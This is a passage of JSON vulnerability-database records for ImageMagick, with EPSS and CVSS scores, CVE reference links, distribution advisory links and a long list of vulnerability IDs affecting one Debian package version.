"0.28042", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00102", "scoring_system": "epss", "scoring_elements": "0.28108", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00102", "scoring_system": "epss", "scoring_elements": "0.28151", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00102", "scoring_system": "epss", "scoring_elements": "0.28159", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00102", "scoring_system": "epss", "scoring_elements": "0.28115", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00102", "scoring_system": "epss", "scoring_elements": "0.28058", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00102", "scoring_system": "epss", "scoring_elements": "0.28069", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00102", "scoring_system": "epss", "scoring_elements": "0.28052", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00102", "scoring_system": "epss", "scoring_elements": "0.28136", "published_at": "2026-04-01T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2019-13307" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.1", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1730351", "reference_id": "1730351", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1730351" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=931448", "reference_id": "931448", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=931448" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2020:1180", "reference_id": "RHSA-2020:1180", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2020:1180" }, { "reference_url": "https://usn.ubuntu.com/4192-1/", "reference_id": "USN-4192-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4192-1/" }, { "reference_url": "https://usn.ubuntu.com/7053-1/", "reference_id": "USN-7053-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7053-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1036899?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.7.4%2Bdfsg-11%2Bdeb9u8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-12rd-dhh3-h3ea" }, { "vulnerability": "VCID-152y-9pjj-p7b7" }, { "vulnerability": "VCID-15mv-khzp-fqfk" }, { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-18rv-b2mg-jbex" }, { "vulnerability": "VCID-1abc-45xr-5bhb" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-1daq-9kb7-eudz" }, { "vulnerability": "VCID-1e38-tmxy-9kew" }, { "vulnerability": "VCID-1ftp-6fvm-rfez" }, { "vulnerability": "VCID-1gh4-vs86-aufs" }, { "vulnerability": "VCID-1gqw-pheb-hfey" }, { "vulnerability": "VCID-1nrq-kzuy-vyfx" }, { "vulnerability": "VCID-1q1g-ses8-wqae" }, { "vulnerability": "VCID-1q97-afut-4ffy" }, { "vulnerability": "VCID-1x18-b9sa-yygh" }, { "vulnerability": "VCID-1x5f-2jf7-hbb2" }, { "vulnerability": "VCID-25zp-duta-2ffk" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2a2h-yk41-qybt" }, { "vulnerability": "VCID-2dgn-j4dn-9fcd" }, { "vulnerability": "VCID-2dwv-ndt5-gfg2" }, { "vulnerability": "VCID-2ea6-uaw4-wba9" }, { "vulnerability": "VCID-2fzg-6h13-s7bk" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2ken-ysm1-2ybw" }, { "vulnerability": "VCID-2m38-vt4m-5ffa" }, { "vulnerability": "VCID-2pwb-71f5-8ken" }, { "vulnerability": "VCID-2r23-hhkx-9fh6" }, { "vulnerability": "VCID-2wxd-hmac-4fcv" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-38vp-3yf8-aue8" }, { "vulnerability": "VCID-3bbh-2exn-m7ac" }, { "vulnerability": "VCID-3dsm-e7ye-wqe1" }, { "vulnerability": "VCID-3fa4-xqhq-2fdq" }, { "vulnerability": "VCID-3fzh-1hk1-3ub1" }, { "vulnerability": "VCID-3pky-3t1q-v3av" }, { "vulnerability": "VCID-3qad-mewf-8khz" }, { "vulnerability": "VCID-3ubj-wp5c-ruat" }, { "vulnerability": "VCID-3vc6-9vhj-ckb2" }, { "vulnerability": "VCID-3yqe-cntb-t3fb" }, { "vulnerability": "VCID-3zbe-p6ue-ffe8" }, { "vulnerability": "VCID-41xr-8ryd-z3ew" }, { "vulnerability": "VCID-453d-2nac-jbdc" }, { "vulnerability": "VCID-4633-67u6-akg8" }, { "vulnerability": "VCID-46ey-s7sy-9qby" }, { "vulnerability": "VCID-46gw-xunr-jqbp" }, { "vulnerability": "VCID-477e-a2hz-aqb9" }, { "vulnerability": "VCID-4az8-8361-7bg2" }, { "vulnerability": "VCID-4dxa-f7vm-7feh" }, { "vulnerability": "VCID-4f97-2smu-6qfc" }, { "vulnerability": "VCID-4kxf-5xrh-uue8" }, { "vulnerability": "VCID-4pzm-24uf-73b6" }, { "vulnerability": "VCID-4s25-p8ea-zkh7" }, { "vulnerability": "VCID-4urn-ywwt-ayeg" }, { "vulnerability": "VCID-5114-9n17-pkd1" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-56xz-svu7-eue2" }, { "vulnerability": "VCID-57gx-fkgs-f7cb" }, { "vulnerability": "VCID-5a4x-wwha-pufn" }, { "vulnerability": "VCID-5fc9-tutn-dubw" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5u53-66es-vkbv" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5y72-4n85-qyeb" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-6279-tc7g-g3ag" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-65b6-jbxy-gudt" }, { "vulnerability": "VCID-68kj-s42g-effd" }, { "vulnerability": "VCID-6bf2-uh5z-kfg7" }, { "vulnerability": "VCID-6d5n-tv5h-xkhj" }, { "vulnerability": "VCID-6gh6-3g99-x7hz" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6hay-bjuv-nygd" }, { "vulnerability": "VCID-6jnv-nnkm-v7a3" }, { "vulnerability": "VCID-6kep-3ygd-hkbn" }, { "vulnerability": "VCID-6vvv-g1fm-4bdn" }, { "vulnerability": "VCID-6wy3-xwez-vfej" }, { "vulnerability": "VCID-6y99-sgwe-tygw" }, { "vulnerability": "VCID-6yn4-p8f4-pbh1" }, { "vulnerability": "VCID-6zuv-uh18-k3c1" }, { "vulnerability": "VCID-73j4-24p8-pbe5" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-78zg-am5w-gugh" }, { "vulnerability": "VCID-79w4-fqmh-j3bk" }, { "vulnerability": "VCID-7dqc-1d5h-uybs" }, { "vulnerability": "VCID-7eeu-wtkq-dyc1" }, { "vulnerability": "VCID-7fw6-fzyj-7qf3" }, { "vulnerability": "VCID-7gya-qyjx-qqfx" }, { "vulnerability": "VCID-7jvc-54zg-pbcz" }, { "vulnerability": "VCID-7jx8-htkz-7qd4" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-7vrs-x5dn-sbcm" }, { "vulnerability": "VCID-7ynu-qf57-ykba" }, { "vulnerability": "VCID-7yur-twpa-n3e1" }, { "vulnerability": "VCID-834e-c7gn-afac" }, { "vulnerability": "VCID-872v-6z75-jucm" }, { "vulnerability": "VCID-8862-dh13-hyga" }, { "vulnerability": "VCID-8an6-y8xy-pyf3" }, { "vulnerability": "VCID-8j37-fwz2-bfea" }, { "vulnerability": "VCID-8jgu-2tx3-gkcb" }, { "vulnerability": "VCID-8n3f-ass1-97gj" }, { "vulnerability": "VCID-8v7y-kcz2-bbb9" }, { "vulnerability": "VCID-8yfc-gunh-17a2" }, { "vulnerability": "VCID-92es-dtbz-tqae" }, { "vulnerability": "VCID-93a6-7956-v3ar" }, { "vulnerability": "VCID-93em-sxxc-j3ep" }, { "vulnerability": "VCID-99f6-k1y9-x7ba" }, { "vulnerability": "VCID-9akb-t56u-4yhr" }, { "vulnerability": "VCID-9ark-hra3-zyh9" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-9h1k-h8gw-hkat" }, { "vulnerability": "VCID-9n1x-qw25-mbhf" }, { "vulnerability": "VCID-9pr7-aw96-cqfb" }, { "vulnerability": "VCID-9xbc-3nhd-cygp" }, { "vulnerability": "VCID-9z34-j85g-9kej" }, { "vulnerability": "VCID-acgu-hc83-yubn" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-aej5-sgf8-7uhp" }, { "vulnerability": "VCID-agz5-g8mr-e7hn" }, { "vulnerability": "VCID-anh4-1hmn-yfh8" }, { "vulnerability": "VCID-aqs4-r36j-ffe7" }, { "vulnerability": "VCID-ay8n-59tt-k7cp" }, { "vulnerability": "VCID-aycq-4vqg-ubgp" }, { "vulnerability": "VCID-b32k-mwuv-hfeq" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-b7dh-gjtk-qfhn" }, { "vulnerability": "VCID-b8hx-6u4j-b3dc" }, { "vulnerability": "VCID-bcy4-phg3-w3fq" }, { "vulnerability": "VCID-bf7n-dsx6-rqa2" }, { "vulnerability": "VCID-bge6-p7sc-dqdu" }, { "vulnerability": "VCID-bhkh-rppj-1bb5" }, { "vulnerability": "VCID-bky2-hjpj-67ag" }, { "vulnerability": "VCID-c11x-uq25-17b1" }, { "vulnerability": "VCID-c8rr-y6zy-h7h5" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-ccbh-689z-6kg2" }, { "vulnerability": "VCID-chgt-azpf-auba" }, { "vulnerability": "VCID-cmym-m1da-f3fg" }, { "vulnerability": "VCID-crpp-9mt6-nbb6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-cure-qgzj-8qfu" }, { "vulnerability": "VCID-cuyh-2uau-1yad" }, { "vulnerability": "VCID-cwez-6cgj-17gz" }, { "vulnerability": "VCID-cz1h-x2a4-zkhj" }, { "vulnerability": "VCID-d74a-pd2n-6khw" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dge7-469z-u7gq" }, { "vulnerability": "VCID-djqz-f6k5-fqfj" }, { "vulnerability": "VCID-dkf5-8kww-mkhn" }, { "vulnerability": "VCID-dkzb-3u3f-yuee" }, { "vulnerability": "VCID-dsee-yrq9-cuca" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-dvvt-ud6y-ffe8" }, { "vulnerability": "VCID-dzxx-5pbd-fqc4" }, { "vulnerability": "VCID-e3av-cqc9-dye1" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb86-ytt7-j3gf" }, { "vulnerability": "VCID-ee5d-s8eb-tbdn" }, { "vulnerability": "VCID-eeah-xwrp-f3b5" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-ekgu-5zg9-2uaa" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-envn-rnvj-4yd2" }, { "vulnerability": "VCID-ep6g-44qy-5qd7" }, { "vulnerability": "VCID-eqr7-q1ga-8kcr" }, { "vulnerability": "VCID-es5w-6nr6-73cn" }, { "vulnerability": "VCID-et5y-g25w-4qay" }, { "vulnerability": "VCID-ezcj-2yaf-rfhh" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-f9z9-h8bt-9bg7" }, { "vulnerability": "VCID-fbta-m4mx-jfap" }, { "vulnerability": "VCID-fd5j-v9vt-5fbu" }, { "vulnerability": "VCID-fds9-yfxw-gqgs" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-fzct-psgq-8fcb" }, { "vulnerability": "VCID-fzhr-jhhc-m3ej" }, { "vulnerability": "VCID-g1ct-6d28-g3ab" }, { "vulnerability": "VCID-g2k2-5sn8-t7dz" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g6mw-mvbu-fbcs" }, { "vulnerability": "VCID-g6sp-5zkq-dkf9" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gc9p-4vdm-rbah" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-gf8v-mmd7-hqag" }, { "vulnerability": "VCID-gp36-v664-vuh2" }, { "vulnerability": "VCID-gq8m-6nq9-4bcq" }, { "vulnerability": "VCID-gqgz-418x-skd3" }, { "vulnerability": "VCID-gqky-zdxn-e3gd" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-h6ps-ukb8-qfa9" }, { "vulnerability": "VCID-h7em-v8x6-63e3" }, { "vulnerability": "VCID-hcjv-e7jt-nbbp" }, { "vulnerability": "VCID-hcxd-bker-sqc1" }, { "vulnerability": "VCID-hrrw-ufje-akg5" }, { "vulnerability": "VCID-hry9-mkha-nfct" }, { "vulnerability": "VCID-hwcd-dj3f-guay" }, { "vulnerability": "VCID-hzr4-8x4m-87cy" }, { "vulnerability": "VCID-j1jt-g5m8-ffbh" }, { "vulnerability": "VCID-jbhc-41ed-guap" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jcmt-5fes-jug2" }, { "vulnerability": "VCID-je5t-8uuq-ekdk" }, { "vulnerability": "VCID-jjzy-ch18-qkfp" }, { "vulnerability": "VCID-jkdz-rbkr-pygc" }, { "vulnerability": "VCID-jpxf-qevp-kycp" }, { "vulnerability": "VCID-jqv2-v42r-7ybf" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jume-bjh7-f3hr" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-jz9p-mte7-vfb3" }, { "vulnerability": "VCID-k1pr-h6c7-2fgp" }, { "vulnerability": "VCID-k1v6-jp8s-pye7" }, { "vulnerability": "VCID-k7ku-8uya-kbeu" }, { "vulnerability": "VCID-kd82-724m-77h8" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-kfb4-xnqr-cya6" }, { "vulnerability": "VCID-kq6x-z56m-wqhh" }, { "vulnerability": "VCID-kxus-63yw-sufe" }, { "vulnerability": "VCID-m31q-v2ue-zyh1" }, { "vulnerability": "VCID-m9bk-66wv-vqbk" }, { "vulnerability": "VCID-mcry-3vgm-kyh1" }, { "vulnerability": "VCID-mg1t-vz1h-47b9" }, { "vulnerability": "VCID-mhbe-8x14-f3d6" }, { "vulnerability": "VCID-mmw7-4m3z-2kcn" }, { "vulnerability": "VCID-mn5y-2hmf-dkgy" }, { "vulnerability": "VCID-mn7e-8e4j-dqba" }, { "vulnerability": "VCID-mt9h-kjh8-kbdu" }, { "vulnerability": "VCID-mvga-q2ts-mqdh" }, { "vulnerability": "VCID-mwf4-u6v6-zqdu" }, { "vulnerability": "VCID-mws6-wym5-d3f6" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-my2x-tnvf-wqbw" }, { "vulnerability": "VCID-n22y-f9az-fubm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-n59p-w7sh-sbhb" }, { "vulnerability": "VCID-neaa-39c7-sfbc" }, { "vulnerability": "VCID-ngzz-mwp9-rkdv" }, { "vulnerability": "VCID-nnmr-dnnk-qkc4" }, { "vulnerability": "VCID-nsfn-bhe3-cbd4" }, { "vulnerability": "VCID-nsn7-a7z8-1qcd" }, { "vulnerability": "VCID-nvea-drm5-h3au" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-nxfx-jh82-vud3" }, { "vulnerability": "VCID-ny9s-4kcr-tbf4" }, { "vulnerability": "VCID-nzh5-tng5-8qdq" }, { "vulnerability": "VCID-p3p3-suuz-dycr" }, { "vulnerability": "VCID-p3vh-b6jn-f3e2" }, { "vulnerability": "VCID-p4yb-mqca-v7c8" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-p5f8-45e4-ybex" }, { "vulnerability": "VCID-p6m5-ntbm-auct" }, { "vulnerability": "VCID-paf4-ycea-buae" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-ph82-atva-6kgd" }, { "vulnerability": "VCID-pj8s-qad1-6qdu" }, { "vulnerability": "VCID-pjm4-2g47-4qau" }, { "vulnerability": "VCID-pk4j-w1q9-vqd2" }, { "vulnerability": "VCID-pmpn-drv8-9ude" }, { "vulnerability": "VCID-pnk5-26uq-w3cu" }, { "vulnerability": "VCID-ps6p-v38m-6qe3" }, { "vulnerability": "VCID-psf6-cvdn-h3b1" }, { "vulnerability": "VCID-ptej-pfyn-z3aq" }, { "vulnerability": "VCID-pthp-wza7-hkgm" }, { "vulnerability": "VCID-punt-nwt4-uqea" }, { "vulnerability": "VCID-pwhs-ep5j-pqa7" }, { "vulnerability": "VCID-pydk-g827-guc5" }, { "vulnerability": "VCID-q2zg-jh8m-tua2" }, { "vulnerability": "VCID-q3v4-jztv-9bbs" }, { "vulnerability": "VCID-qda9-n7gh-c7c4" }, { "vulnerability": "VCID-qjrj-rdqd-uqdy" }, { "vulnerability": "VCID-qp4x-w3fe-hyer" }, { "vulnerability": "VCID-qrqm-h5se-1kep" }, { "vulnerability": "VCID-r1uc-e1w7-kyda" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rf1t-45cj-mue1" }, { "vulnerability": "VCID-rhpj-r7ym-7kdn" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-rqdx-1pdv-a3bu" }, { "vulnerability": "VCID-rqm7-d751-myfa" }, { "vulnerability": "VCID-rrvd-vd81-sfdm" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-rvjq-uks4-x3h3" }, { "vulnerability": "VCID-rwat-s4hf-v7bv" }, { "vulnerability": "VCID-rxgw-h3br-b7dy" }, { "vulnerability": "VCID-rypf-qy6p-3bac" }, { "vulnerability": "VCID-ryu7-2nsu-kqf6" }, { "vulnerability": "VCID-rzge-64xp-bfej" }, { "vulnerability": "VCID-rzvc-hba1-zfcy" }, { "vulnerability": "VCID-rzz2-km3v-b3hw" }, { "vulnerability": "VCID-s4cu-swuc-9fh4" }, { "vulnerability": "VCID-s4p8-s262-fqfx" }, { "vulnerability": "VCID-s543-mazj-fqfd" }, { "vulnerability": "VCID-s7tx-uu27-xqb5" }, { "vulnerability": "VCID-sat2-d6u2-f3c9" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-sdwh-3s12-17fr" }, { "vulnerability": "VCID-snup-2hn7-sue2" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-swqu-wape-83bj" }, { "vulnerability": "VCID-sy2v-5ufy-sfc4" }, { "vulnerability": "VCID-szhs-nysy-6bap" }, { "vulnerability": "VCID-t2pe-etah-1bh3" }, { "vulnerability": "VCID-t4gn-rwz1-ykcf" }, { "vulnerability": "VCID-tc3z-912z-afc8" }, { "vulnerability": "VCID-thbh-m54e-z7ca" }, { "vulnerability": "VCID-tm56-q7ka-ukft" }, { "vulnerability": "VCID-tms4-1k6m-cqgd" }, { "vulnerability": "VCID-tn11-bwg6-m3e3" }, 